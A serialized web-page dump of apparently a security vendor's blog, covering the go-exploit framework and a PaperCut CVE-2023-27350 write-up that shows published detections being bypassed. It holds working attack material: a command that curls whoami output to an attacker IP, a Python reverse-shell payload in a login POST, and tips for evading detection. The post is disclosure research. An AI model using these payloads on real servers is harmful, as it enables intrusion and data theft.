10.9.49.214:35868\n",[1373,98578,98579,98581,98583,98585],{"class":1375,"line":4817},[1373,98580,7035],{"class":1383},[1373,98582,35613],{"class":1397},[1373,98584,15050],{"class":1383},[1373,98586,98587],{"class":4640}," Active shell from 10.9.49.214:35868\n",[1373,98589,98590,98592],{"class":1375,"line":4825},[1373,98591,4644],{"class":2206},[1373,98593,98594],{"class":1391}," whoami\n",[1373,98596,98597,98599,98602,98605,98608,98610,98612],{"class":1375,"line":4835},[1373,98598,39103],{"class":2206},[1373,98600,98601],{"class":1391}," no",[1373,98603,98604],{"class":1391}," job",[1373,98606,98607],{"class":1391}," control",[1373,98609,57301],{"class":1391},[1373,98611,69476],{"class":1391},[1373,98613,98614],{"class":1391}," shell\n",[1373,98616,98617,98620],{"class":1375,"line":4843},[1373,98618,98619],{"class":2206},"sh-4.2#",[1373,98621,98594],{"class":1391},[1373,98623,98624],{"class":1375,"line":4849},[1373,98625,98626],{"class":2206},"root\n",[1373,98628,98629,98631],{"class":1375,"line":4877},[1373,98630,4644],{"class":2206},[1373,98632,98633],{"class":1391}," pwd\n",[1373,98635,98636],{"class":1375,"line":4915},[1373,98637,98638],{"class":1379},"pwd\n",[1373,98640,98641],{"class":1375,"line":4931},[1373,98642,98643],{"class":2206},"\u002Ftmp\n",[1373,98645,98646],{"class":1375,"line":4947},[1373,98647,98648],{"class":2206},"$\n",[61,98650,1903],{"id":1902},[18,98652,98653,98655,98656,98658,98659,98661,98662,10515,98664,31181],{},[886,98654,20558],{}," provides a simple and efficient way to develop sophisticated and portable exploits. While there are several other existing exploit frameworks available, none offer the same experience as ",[886,98657,20558],{},". If you are interested in contributing to ",[886,98660,20558],{}," or have feedback on your own experience developing exploits, we would love to hear from you! 
Visit ",[886,98663,20558],{},[47,98665,98667],{"href":14297,"rel":98666},[51],"on GitHub",[2901,98669,98670],{},"",{"title":219,"searchDepth":220,"depth":220,"links":98672},[98673,98674,98676,98678],{"id":96741,"depth":220,"text":96742},{"id":96804,"depth":220,"text":98675},"Creating an Exploit with go-exploit",{"id":97307,"depth":220,"text":98677},"A go-exploit for CVE-2022-44877",{"id":1902,"depth":220,"text":1903},"2023-05-25","VulnCheck is excited to announce the open-source release of our in-house exploit framework, go-exploit. 
Designed with simplicity and portability in mind, go-exploit empowers exploit developers to create compact, self-contained, and consistent exploits.",{"slug":20558},"\u002Fblog\u002Fgo-exploit",{"title":96706,"description":98680},"blog\u002Fgo-exploit","y6UTqrJzTAaybQ6-t4njX3b_aJfYuSdxmj6mcHcjM_0",{"id":98687,"title":83462,"articles":98688,"authors":98738,"body":98740,"date":98695,"description":99859,"extension":234,"image":7,"link":7,"meta":99860,"navigation":237,"path":99862,"seo":99863,"series":7,"stem":99864,"subtype":7,"tags":99865,"__hash__":99866},"blog\u002Fblog\u002Fpapercut-rce.md",[98689,98693,98696,98699,98703,98706,98710,98713,98717,98721,98725,98728,98731,98734],{"title":98690,"source":14390,"link":98691,"date":98692},"Experts devised a new exploit for the PaperCut flaw that can bypass all current detection","https:\u002F\u002Fsecurityaffairs.com\u002F145752\u002Fhacking\u002Fpapercut-new-exploit.html","2023-05-03",{"title":98694,"source":14390,"link":98691,"date":98695},"VulnCheck researchers devised a new exploit for a recently disclosed critical flaw in PaperCut servers that bypasses all current detections.","2023-05-04",{"title":98697,"source":14382,"link":98698,"date":98695},"Researchers Uncover New Exploits for PaperCut Vulnerability That Can Bypass Detection","https:\u002F\u002Fthehackernews.com\u002F2023\u002F05\u002Fresearchers-uncover-new-exploit-for.html",{"title":98700,"source":73072,"link":98701,"date":98702},"Cyber Security Headlines: Royal ransoms Dallas, new PaperCut exploit, CISA’s Mirai warning","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-royal-ransoms-dallas-new-papercut-exploit-cisas-mirai-warning\u002F","2023-05-05",{"title":98704,"source":30021,"link":98705,"date":98702},"Vulnerability in PaperCut MF and NG Allows Attackers to Bypass Security 
Detections","https:\u002F\u002Fwww.enterprisesecuritytech.com\u002Fpost\u002Fvulnerability-in-papercut-mf-and-ng-allows-attackers-to-bypass-security-detections",{"title":98707,"source":98708,"link":98709,"date":98702},"Cyber Security Today, May 5, 2023 – Data breach at the Metropolitan Opera, and more GoAnywhere MFT victims","ITWorld Canada","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-may-5-2023-data-breach-at-the-metropolitan-opera-and-more-goanywhere-mft-victims\u002F538259",{"title":98711,"source":3494,"link":98712,"date":98702},"Risky Biz News: Facebook takes down NodeStealer malware before it can take off the ground","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-facebook-takes-down",{"title":98714,"source":14373,"link":98715,"date":98716},"New PaperCut RCE exploit created that bypasses existing detections","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-papercut-rce-exploit-created-that-bypasses-existing-detections\u002F","2023-05-06",{"title":98718,"source":14373,"link":98719,"date":98720},"Microsoft: Iranian hacking groups join Papercut attack spree","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fmicrosoft-iranian-hacking-groups-join-papercut-attack-spree\u002F","2023-05-08",{"title":98722,"source":61450,"link":98723,"date":98724},"New Way to Exploit PaperCut Vulnerability Detected","https:\u002F\u002Fwww.cysecurity.news\u002F2023\u002F05\u002Fnew-way-to-exploit-papercut.html","2023-05-09",{"title":98726,"source":39566,"link":98727,"date":98724},"State-sponsored and state-promoted cyber campaigns. Royal ransomware. A new wave of BEC. 
MtM attacks rising.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F89",{"title":98729,"source":39566,"link":98730,"date":98724},"PaperCut vulnerability detection methods can be bypassed, and Iranian threat actors have joined the fray.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fresearch-briefing\u002F5\u002F19",{"title":98732,"source":14382,"link":98733,"date":98724},"Microsoft Warns of State-Sponsored Attacks Exploiting Critical PaperCut Vulnerability","https:\u002F\u002Fthehackernews.com\u002F2023\u002F05\u002Fmicrosoft-warns-of-state-sponsored.html",{"title":98735,"source":11233,"link":98736,"date":98737},"Vulnerable PaperCut servers targeted by Iranian hackers","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fvulnerability-management\u002Fvulnerable-papercut-servers-targeted-by-iranian-hackers","2023-05-10",[98739],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":98741,"toc":99850},[98742,98745,98747,98760,98763,98766,98768,98772,98775,98777,98780,98793,98802,98810,98864,98867,98873,98884,98890,98896,98949,98952,98956,98959,98970,98974,98987,99002,99019,99025,99034,99038,99041,99047,99050,99054,99057,99190,99196,99206,99210,99213,99216,99222,99225,99235,99238,99252,99258,99265,99465,99470,99548,99560,99792,99818,99824,99827,99830,99836,99839,99842,99844,99847],[263,98743],{":list":98744,"ico":266,"title":83462},"[\"In mid-April attackers began exploiting a vulnerability in PaperCut NG and MF that was later assigned CVE-2023-27350.\",\"Multiple security organizations published exploit detections and indicators of compromise, including Huntress, Horizon3.ai, Proofpoint, and Microsoft.\",\"Today, VulnCheck published a proof-of-concept exploit that bypasses all published detections.\",\"This report shows that detections that focus on one code execution method, or that focus on a small subset of techniques used by one threat actor, are doomed to be useless in the next round of 
attacks.\",\"Since attackers learn from defenders' public detections, it's the defenders’ responsibility to produce robust detections that aren’t easily bypassed.\"]",[1920,98746,11648],{"id":11647},[18,98748,98749,98750,98754,98755,98759],{},"In mid-April, attackers began exploiting a vulnerability in ",[47,98751,70907],{"href":98752,"rel":98753},"https:\u002F\u002Fwww.papercut.com\u002F",[51]," NG and MF. The exploited vulnerability would later be assigned ",[47,98756,61693],{"href":98757,"rel":98758},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-27350",[51],". Multiple security organizations have published exploit detections and indicators of compromise that assume attackers are executing code through PaperCut’s built-in scripting interface. However, VulnCheck researchers have found a proof-of-concept exploit that bypasses all published detections from Huntress, Horizon3.ai, Emerging Threats and Microsoft.",[18,98761,98762],{},"How did this happen? PaperCut NG and MF offer multiple paths to code execution. In this blog, we detail one such path and show how an attacker can avoid existing detections based on the defender's incorrect assumptions.",[18,98764,98765],{},"Before diving into the new code execution path, let’s look at the history of this vulnerability and survey the current exploits and detections that the security community has published.",[1920,98767,11273],{"id":11272},[61,98769,98771],{"id":98770},"timeline","Timeline",[61025,98773],{":entries":98774},"[{\"date\":\"March 15, 2023\",\"markdown\":\"PaperCut Software released an [advisory](https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20230315190445\u002Fhttps:\u002F\u002Fwww.papercut.com\u002Fkb\u002FMain\u002FPO-1216-and-PO-1219) for two vulnerabilities discovered by Trend Micro’s [ZDI](https:\u002F\u002Fwww.zerodayinitiative.com\u002F) program. 
The initial advisory contained no CVE identifiers, but instead referred to the vulnerabilities by their ZDI names&#58; [ZDI-CAN-18987](https:\u002F\u002Fwww.zerodayinitiative.com\u002Fadvisories\u002FZDI-23-233\u002F) and [ZDI-CAN-19226](https:\u002F\u002Fwww.zerodayinitiative.com\u002Fadvisories\u002FZDI-23-232\u002F).\"},{\"date\":\"April 13, 2023\",\"markdown\":\"Attacks in the wild began around this [time](https:\u002F\u002Fnews.sophos.com\u002Fen-us\u002F2023\u002F04\u002F27\u002Fincreased-exploitation-of-papercut-drawing-blood-around-the-internet\u002F).\"},{\"date\":\"April 19, 2023\",\"markdown\":\"PaperCut Software updated their [advisory](https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20230419185044\u002Fhttps:\u002F\u002Fwww.papercut.com\u002Fkb\u002FMain\u002FPO-1216-and-PO-1219) to indicate the vulnerabilities had been exploited in the wild.\"},{\"date\":\"April 20, 2023\",\"markdown\":\"CVE identifiers for the vulnerabilities were [published](https:\u002F\u002Fwww.cve.org\u002FCVERecord?id=CVE-2023-27350). The authentication bypass was assigned CVE-2023-27350. The CVEs were published by ZDI, more than a month after they published their own advisories.\"},{\"date\":\"April 21, 2023\",\"markdown\":\"Huntress Labs published a blog detailing exploitation in the wild. CISA added CVE-2023-27350 to the CISA KEV list. 
Public exploits demonstrating the bypass appeared on [GitHub](https:\u002F\u002Fraw.githubusercontent.com\u002FTamingSariMY\u002FCVE-2023-27350-POC\u002Fmain\u002Fvuln.py).\"},{\"date\":\"April 24, 2023\",\"markdown\":\"Horizon3.ai [published](https:\u002F\u002Fwww.horizon3.ai\u002Fpapercut-cve-2023-27350-deep-dive-and-indicators-of-compromise\u002F) an exploit that demonstrated the bypass *and* executed arbitrary code.\"},{\"date\":\"April 26, 2023\",\"markdown\":\"Microsoft attributes attacks in mid-April to [TA505](https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fta505).\"}]",[61,98776,84831],{"id":84830},[18,98778,98779],{},"At the time of writing, two public exploit variants use CVE-2023-27350 and execute arbitrary code on PaperCut NG and MF:",[1789,98781,98782,98785],{},[25,98783,98784],{},"Exploits that use the PaperCut print scripting interface to execute Windows commands (variations on the Horizon3.ai exploit).",[25,98786,98787,98788,27987],{},"Exploits that use the print scripting interface to drop a malicious JAR (see this Metasploit ",[47,98789,98792],{"href":98790,"rel":98791},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework",[51],"pull request",[18,98794,98795,98796,98801],{},"In both cases, the attacker abuses the system’s built-in JavaScript interface. The JavaScript engine is ",[47,98797,98800],{"href":98798,"rel":98799},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FRhino_(JavaScript_engine)",[51],"Rhino",", which also allows that user to execute arbitrary Java. 
PaperCut Software implemented configuration options to lessen the risk of this arbitrary code execution vector, but since the attacker has full administrative access, those protections are easily disabled.",[18,98803,98804,98805,98807,98808,4606],{},"Horizon3.ai’s exploit uses the scripting interface to execute a single Windows command (",[886,98806,22876],{},") and sends the response back to the attacker via ",[886,98809,1557],{},[1354,98811,98813],{"className":27194,"code":98812,"language":27196,"meta":219,"style":219},"java.lang.Runtime.getRuntime().exec('cmd.exe \u002FC \\\"for \u002FF \\\"usebackq delims=\\\" %A in (`whoami`) do curl http:\u002F\u002F10.0.40.83:8081\u002F%A\\\"');\n",[886,98814,98815],{"__ignoreMap":219},[1373,98816,98817,98819,98821,98824,98826,98828,98830,98832,98834,98836,98838,98840,98843,98845,98848,98850,98853,98855,98858,98860,98862],{"class":1375,"line":1376},[1373,98818,27196],{"class":4640},[1373,98820,59],{"class":1383},[1373,98822,98823],{"class":4640},"lang",[1373,98825,59],{"class":1383},[1373,98827,91363],{"class":4640},[1373,98829,59],{"class":1383},[1373,98831,27896],{"class":7297},[1373,98833,16355],{"class":1383},[1373,98835,27901],{"class":7297},[1373,98837,1384],{"class":1383},[1373,98839,1388],{"class":1387},[1373,98841,98842],{"class":1391},"cmd.exe \u002FC ",[1373,98844,17131],{"class":2326},[1373,98846,98847],{"class":1391},"for \u002FF ",[1373,98849,17131],{"class":2326},[1373,98851,98852],{"class":1391},"usebackq delims=",[1373,98854,17131],{"class":2326},[1373,98856,98857],{"class":1391}," %A in (`whoami`) do curl http:\u002F\u002F10.0.40.83:8081\u002F%A",[1373,98859,17131],{"class":2326},[1373,98861,1388],{"class":1387},[1373,98863,4680],{"class":1383},[18,98865,98866],{},"Perhaps the main reason they didn’t establish a reverse shell is because the scripting engine has a five second timeout (see decompiled code below). 
The attacker cannot maintain execution in the engine itself; they have to migrate to another process.",[18,98868,98869],{},[68,98870],{":width":10862,"alt":98871,"src":98872},"decompiled papercut jar","\u002Fblog\u002Fpapercut-rce\u002Frhino-timeout.png",[18,98874,98875,98876,98879,98880,98883],{},"The previously mentioned Metasploit module is interesting. It doesn’t use ",[886,98877,98878],{},"java.lang.Runtime.getRuntime().exec()",". Instead, it uses ",[886,98881,98882],{},"java.net.URLClassLoader"," to load a remote Java class. The loaded class will eventually drop a Meterpreter JAR to disk and execute it.",[18,98885,98886,98887,98889],{},"The Java-focused exploitation is useful because PaperCut NG and MF support Linux, Mac, ",[1131,98888,297],{}," Windows. A Windows-only attack is restricted to… only Windows victims. This approach treats all victims equally.",[18,98891,98892,98893,98895],{},"Unfortunately, while it sounds good on paper, the Metasploit attack is not great. The Meterpreter JAR is more or less unobfuscated and well known to be immediately flagged by Windows Defender (among other AV). As soon as it touches the disk, it’ll be removed. On Linux, where there is less likely to be any AV\u002FEDR, the payload screams that it's malicious. 
The phrase “metasploit.Payload” literally appears in ",[886,98894,55448],{}," output.",[1354,98897,98899],{"className":31740,"code":98898,"language":2186,"meta":219,"style":219},"papercut   40671  \u002Fhome\u002Fpapercut\u002Fruntime\u002Flinux-x64\u002Fjre\u002Fbin\u002Fjava -classpath \u002Ftmp\u002F~spawn8498983783261235927.tmp.dir metasploit.Payload\npapercut   40689   \\_ sh -c \u002Fbin\u002Fsh\npapercut   40690       \\_ \u002Fbin\u002Fsh\n",[886,98900,98901,98921,98937],{"__ignoreMap":219},[1373,98902,98903,98906,98909,98912,98915,98918],{"class":1375,"line":1376},[1373,98904,98905],{"class":2206},"papercut",[1373,98907,98908],{"class":5467},"   40671",[1373,98910,98911],{"class":1391},"  \u002Fhome\u002Fpapercut\u002Fruntime\u002Flinux-x64\u002Fjre\u002Fbin\u002Fjava",[1373,98913,98914],{"class":2209}," -classpath",[1373,98916,98917],{"class":1391}," \u002Ftmp\u002F~spawn8498983783261235927.tmp.dir",[1373,98919,98920],{"class":1391}," metasploit.Payload\n",[1373,98922,98923,98925,98928,98930,98932,98934],{"class":1375,"line":220},[1373,98924,98905],{"class":2206},[1373,98926,98927],{"class":5467},"   40689",[1373,98929,79157],{"class":2326},[1373,98931,2236],{"class":1391},[1373,98933,45587],{"class":2209},[1373,98935,98936],{"class":1391}," \u002Fbin\u002Fsh\n",[1373,98938,98939,98941,98944,98947],{"class":1375,"line":1266},[1373,98940,98905],{"class":2206},[1373,98942,98943],{"class":5467},"   40690",[1373,98945,98946],{"class":2326},"       \\_",[1373,98948,98936],{"class":1391},[18,98950,98951],{},"Either way, both approaches trigger detections that’ve been shared among the security community, so let’s look at those more closely.",[61,98953,98955],{"id":98954},"existing-detections","Existing Detections",[18,98957,98958],{},"There have been three types of detections published so far.",[1789,98960,98961,98964,98967],{},[25,98962,98963],{},"Detection via Sysmon (e.g. 
process creation analysis).",[25,98965,98966],{},"Detection via log file analysis.",[25,98968,98969],{},"Network signatures.",[993,98971,98973],{"id":98972},"sysmon-detections","Sysmon Detections",[18,98975,98976,98977,982,98981,98986],{},"The Sysmon (or sysmon-esque) detections have been offered up by ",[47,98978,20074],{"href":98979,"rel":98980},"https:\u002F\u002Fgithub.com\u002Fhuntresslabs\u002Fthreat-intel\u002Fblob\u002Fmain\u002F2023\u002F2023-04\u002F20-PaperCut\u002Fwin_susp_papercut_code_execution.yml",[51],[47,98982,98985],{"href":98983,"rel":98984},"https:\u002F\u002Fnews.sophos.com\u002Fen-us\u002F2023\u002F04\u002F27\u002Fincreased-exploitation-of-papercut-drawing-blood-around-the-internet\u002F",[51],"Sophos",". Both essentially boil down to this:",[1925,98988,98989],{},[18,98990,98991,98992,98995,98996,1554,98998,99001],{},"If ",[886,98993,98994],{},"pc-app.exe"," creates a child process called ",[886,98997,14509],{},[886,98999,99000],{},"powershell.exe"," then an attacker is exploiting PaperCut NG\u002FMF.",[18,99003,99004,99005,99008,99009,13573,99011,99013,99014,27987],{},"This is not unreasonable logic. It’s just insufficient. Already we’ve seen a PaperCut exploit that ",[295,99006,99007],{},"doesn’t"," trigger this detection. 
Below is Meterpreter being started by ",[886,99010,98994],{},[886,99012,82664],{}," (note the “spawn” logic in the ",[47,99015,99018],{"href":99016,"rel":99017},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-javapayload\u002Fblob\u002Fdee9809f78a7e86981a8f39e0622f05458c85940\u002Fjavapayload\u002Fsrc\u002Fmain\u002Fjava\u002Fmetasploit\u002FPayload.java#L82",[51],"Java Meterpreter",[18,99020,99021],{},[68,99022],{":width":10862,"alt":99023,"src":99024},"meterpreter jar spawned on windows","\u002Fblog\u002Fpapercut-rce\u002Fspawned-meterpreter.png",[18,99026,99027,99028,99033],{},"There are a whole slew of well-documented ",[47,99029,99032],{"href":99030,"rel":99031},"https:\u002F\u002Flolbas-project.github.io\u002F",[51],"LOLBAS"," an attacker can abuse that would allow them to bypass these detections (as we’ll see later).",[993,99035,99037],{"id":99036},"log-file-detections","Log File Detections",[18,99039,99040],{},"Attacking PaperCut NG and MF via the print scripting interfaces leaves very distinctive entries in the server’s log file. Horizon3.ai noted variations of these entries as good indicators of compromise:",[1354,99042,99045],{"className":99043,"code":99044,"language":1359},[1357],"User \"admin\" logged into the administration interface.\nUser \"admin\" updated the config key “print.script.sandboxed”\nUser \"admin\" updated the config key “device.script.sandboxed”\nAdmin user \"admin\" modified the print script on printer\n",[886,99046,99044],{"__ignoreMap":219},[18,99048,99049],{},"The first entry is generated by CVE-2023-27350 directly. But it's also generated by a normal admin user logging in. Alone, it doesn’t indicate a compromise. The other three entries are all associated with attacking the scripting interface(s). 
An attacker that doesn’t abuse this functionality won’t generate these particular log entries.",[61,99051,99053],{"id":99052},"network-signatures","Network Signatures",[18,99055,99056],{},"Proofpoint’s Open Emerging Threats contains signatures to detect the authentication bypass on the wire. The Suricata rule, modified for brevity, looks like so:",[1354,99058,99060],{"className":31740,"code":99059,"language":2186,"meta":219,"style":219},"alert http any any -> $HOME_NET any ( \\\n msg:\"ET EXPLOIT PaperCut MF\u002FNG SetupCompleted Authentication Bypass (CVE-2023-27350)\"; \\\n flow:established,to_server; \\\n http.method; content:\"GET\"; \\\n http.uri; content:\"\u002Fapp?service=page\u002FSetupCompleted\"; bsize:32; fast_pattern; \\\n reference:cve,2023-27350; \\\n classtype:attempted-admin; \\\n sid:2045130; rev:1;)\n",[886,99061,99062,99090,99106,99115,99132,99158,99167,99176],{"__ignoreMap":219},[1373,99063,99064,99067,99069,99072,99074,99076,99078,99081,99084,99087],{"class":1375,"line":1376},[1373,99065,99066],{"class":2206},"alert",[1373,99068,19100],{"class":1391},[1373,99070,99071],{"class":1391}," any",[1373,99073,99071],{"class":1391},[1373,99075,27425],{"class":4640},[1373,99077,5384],{"class":1397},[1373,99079,99080],{"class":4640}," $HOME_NET ",[1373,99082,99083],{"class":1391},"any",[1373,99085,99086],{"class":4640}," ( ",[1373,99088,99089],{"class":2326},"\\\n",[1373,99091,99092,99095,99097,99100,99102,99104],{"class":1375,"line":220},[1373,99093,99094],{"class":1391}," msg:",[1373,99096,183],{"class":1387},[1373,99098,99099],{"class":1391},"ET EXPLOIT PaperCut MF\u002FNG SetupCompleted Authentication Bypass (CVE-2023-27350)",[1373,99101,183],{"class":1387},[1373,99103,39663],{"class":1383},[1373,99105,76033],{"class":2326},[1373,99107,99108,99111,99113],{"class":1375,"line":1266},[1373,99109,99110],{"class":2206}," 
flow:established,to_server",[1373,99112,39663],{"class":1383},[1373,99114,76033],{"class":2326},[1373,99116,99117,99120,99122,99125,99128,99130],{"class":1375,"line":1852},[1373,99118,99119],{"class":2206}," http.method",[1373,99121,39663],{"class":1383},[1373,99123,99124],{"class":2206}," content:",[1373,99126,99127],{"class":2206},"\"GET\"",[1373,99129,39663],{"class":1383},[1373,99131,76033],{"class":2326},[1373,99133,99134,99137,99139,99141,99144,99146,99149,99151,99154,99156],{"class":1375,"line":4692},[1373,99135,99136],{"class":2206}," http.uri",[1373,99138,39663],{"class":1383},[1373,99140,99124],{"class":2206},[1373,99142,99143],{"class":2206},"\"\u002Fapp?service=page\u002FSetupCompleted\"",[1373,99145,39663],{"class":1383},[1373,99147,99148],{"class":2206}," bsize:32",[1373,99150,39663],{"class":1383},[1373,99152,99153],{"class":2206}," fast_pattern",[1373,99155,39663],{"class":1383},[1373,99157,76033],{"class":2326},[1373,99159,99160,99163,99165],{"class":1375,"line":4724},[1373,99161,99162],{"class":2206}," reference:cve,2023-27350",[1373,99164,39663],{"class":1383},[1373,99166,76033],{"class":2326},[1373,99168,99169,99172,99174],{"class":1375,"line":4756},[1373,99170,99171],{"class":2206}," classtype:attempted-admin",[1373,99173,39663],{"class":1383},[1373,99175,76033],{"class":2326},[1373,99177,99178,99181,99183,99186,99188],{"class":1375,"line":4768},[1373,99179,99180],{"class":2206}," sid:2045130",[1373,99182,39663],{"class":1383},[1373,99184,99185],{"class":2206}," rev:1",[1373,99187,39663],{"class":1383},[1373,99189,11875],{"class":4640},[18,99191,99192,99193,99195],{},"The rule focuses on detecting the exploitation of the vulnerability itself, and ",[1131,99194,6881],{}," the post-authentication activity, which is likely smart. 
That approach would detect the previously mentioned exploits.",[18,99197,99198,99199,1554,99202,99205],{},"However, an attacker interested in doing so can trivially bypass this signature (by using ",[886,99200,99201],{},"page\u002F\u002FSetupCompleted",[886,99203,99204],{},"random=1&page\u002FSetupCompleted",", etc.).",[1920,99207,99209],{"id":99208},"a-new-path-to-exploitation","A New Path to Exploitation",[18,99211,99212],{},"As an attacker, if you know a variety of detections will flag your nefarious activities, you'll obviously do whatever it takes to bypass those detections. In the case of PaperCut NG and MF, however, all the attacker really needs to do is find a new path to code execution. A new path will prevent the bad log entries from being written, and then the attacker can use whatever LOLBAS to bypass the process creation detections.",[18,99214,99215],{},"There are a few places the attacker can pivot to, but let’s look at how an attacker can abuse the PaperCut NG “User\u002FGroup Sync” logic. This interface allows the administrative user to specify a “Custom Program” to source and authenticate users.",[18,99217,99218],{},[68,99219],{":width":10862,"alt":99220,"src":99221},"PaperCut NG User\u002FGroup Sync","\u002Fblog\u002Fpapercut-rce\u002Fusergroupsync.png",[18,99223,99224],{},"The user\u002Fauth programs can be any program on disk. That sounds great (for an attacker), but there are two caveats:",[1789,99226,99227,99230],{},[25,99228,99229],{},"The programs are initially executed without any attacker-controlled parameters.",[25,99231,99232,99233,27987],{},"The auth program has to be interactive (e.g. 
the username and password are passed via ",[886,99234,87517],{},[18,99236,99237],{},"That is restrictive, but we’ve developed proof-of-concept exploits for both Linux and Windows:",[1789,99239,99240,99246],{},[25,99241,99242,99243,59],{},"On Linux, set the auth program to ",[886,99244,99245],{},"\u002Fusr\u002Fsbin\u002Fpython3",[25,99247,99248,99249,59],{},"On Windows, set the auth program to ",[886,99250,99251],{},"C:\\Windows\\System32\\ftp.exe",[18,99253,99254],{},[68,99255],{":width":10862,"alt":99256,"src":99257},"Python3 as Auth Program","\u002Fblog\u002Fpapercut-rce\u002Fpython3authprogram.png",[18,99259,99260,99261,99264],{},"To execute arbitrary code, the attacker just needs to provide a malicious username and password during a login attempt. For example, on Linux we provide a typical Python reverse shell in the ",[886,99262,99263],{},"inputPassword"," parameter.",[1354,99266,99268],{"className":31740,"code":99267,"language":2186,"meta":219,"style":219},"POST \u002Fapp HTTP\u002F1.1\nHost: 10.9.49.222:9191\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F105.0.0.0 Safari\u002F537.36 Edg\u002F105.0.1343.33\nContent-Length: 406\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: JSESSIONID=node01s8zloj765g3lirbwnppvw1qo279.node0\nOrigin: http:\u002F\u002F10.9.49.222:9191\u002F\nReferer: http:\u002F\u002F10.9.49.222:9191\u002Fapp\nAccept-Encoding: gzip\nservice=direct\u002F1\u002FHome\u002F$Form&sp=S0&$Submit$0=Log+in&inputUsername=help&inputPassword=import 
socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.9.49.194\",1270));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"\u002Fbin\u002Fsh\")&Form0=$Hidden$0,$Hidden$1,inputUsername,inputPassword,$Submit$0,$PropertySelection&$Hidden$0=true&$Hidden$1=X&$PropertySelection=en\n",[886,99269,99270,99279,99287,99329,99337,99344,99352,99360,99368,99376],{"__ignoreMap":219},[1373,99271,99272,99274,99277],{"class":1375,"line":1376},[1373,99273,6946],{"class":2206},[1373,99275,99276],{"class":1391}," \u002Fapp",[1373,99278,35589],{"class":1391},[1373,99280,99281,99284],{"class":1375,"line":220},[1373,99282,99283],{"class":2206},"Host:",[1373,99285,99286],{"class":1391}," 10.9.49.222:9191\n",[1373,99288,99289,99292,99295,99298,99301,99304,99306,99309,99311,99314,99317,99320,99323,99326],{"class":1375,"line":1266},[1373,99290,99291],{"class":2206},"User-Agent:",[1373,99293,99294],{"class":1391}," Mozilla\u002F5.0",[1373,99296,99297],{"class":4640}," (Windows ",[1373,99299,99300],{"class":1391},"NT",[1373,99302,99303],{"class":5467}," 10.0",[1373,99305,39663],{"class":1383},[1373,99307,99308],{"class":2206}," Win64",[1373,99310,39663],{"class":1383},[1373,99312,99313],{"class":2206}," x64",[1373,99315,99316],{"class":4640},") AppleWebKit\u002F537.36 (",[1373,99318,99319],{"class":2206},"KHTML,",[1373,99321,99322],{"class":1391}," like",[1373,99324,99325],{"class":1391}," Gecko",[1373,99327,99328],{"class":4640},") Chrome\u002F105.0.0.0 Safari\u002F537.36 Edg\u002F105.0.1343.33\n",[1373,99330,99331,99334],{"class":1375,"line":1852},[1373,99332,99333],{"class":2206},"Content-Length:",[1373,99335,99336],{"class":5467}," 406\n",[1373,99338,99339,99342],{"class":1375,"line":4692},[1373,99340,99341],{"class":2206},"Content-Type:",[1373,99343,7185],{"class":1391},[1373,99345,99346,99349],{"class":1375,"line":4724},[1373,99347,99348],{"class":2206},"Cookie:",[1373,99350,99351],{"class":1391}," 
JSESSIONID=node01s8zloj765g3lirbwnppvw1qo279.node0\n",[1373,99353,99354,99357],{"class":1375,"line":4756},[1373,99355,99356],{"class":2206},"Origin:",[1373,99358,99359],{"class":1391}," http:\u002F\u002F10.9.49.222:9191\u002F\n",[1373,99361,99362,99365],{"class":1375,"line":4768},[1373,99363,99364],{"class":2206},"Referer:",[1373,99366,99367],{"class":1391}," http:\u002F\u002F10.9.49.222:9191\u002Fapp\n",[1373,99369,99370,99373],{"class":1375,"line":4792},[1373,99371,99372],{"class":2206},"Accept-Encoding:",[1373,99374,99375],{"class":1391}," gzip\n",[1373,99377,99378,99381,99383,99386,99389,99391,99394,99396,99399,99401,99404,99407,99410,99412,99415,99417,99419,99421,99423,99425,99427,99430,99432,99434,99436,99439,99441,99444,99446,99449,99452,99455,99457,99459,99462],{"class":1375,"line":4798},[1373,99379,99380],{"class":4640},"service",[1373,99382,5417],{"class":1397},[1373,99384,99385],{"class":1391},"direct\u002F1\u002FHome\u002F",[1373,99387,99388],{"class":4640},"$Form",[1373,99390,7218],{"class":1383},[1373,99392,99393],{"class":4640},"sp",[1373,99395,5417],{"class":1397},[1373,99397,99398],{"class":1391},"S0",[1373,99400,7218],{"class":1383},[1373,99402,99403],{"class":4640},"$Submit",[1373,99405,99406],{"class":19096},"$0",[1373,99408,99409],{"class":4640},"=Log+in",[1373,99411,7218],{"class":1383},[1373,99413,99414],{"class":4640},"inputUsername",[1373,99416,5417],{"class":1397},[1373,99418,39134],{"class":1391},[1373,99420,7218],{"class":1383},[1373,99422,99263],{"class":4640},[1373,99424,5417],{"class":1397},[1373,99426,19043],{"class":1391},[1373,99428,99429],{"class":2206}," 
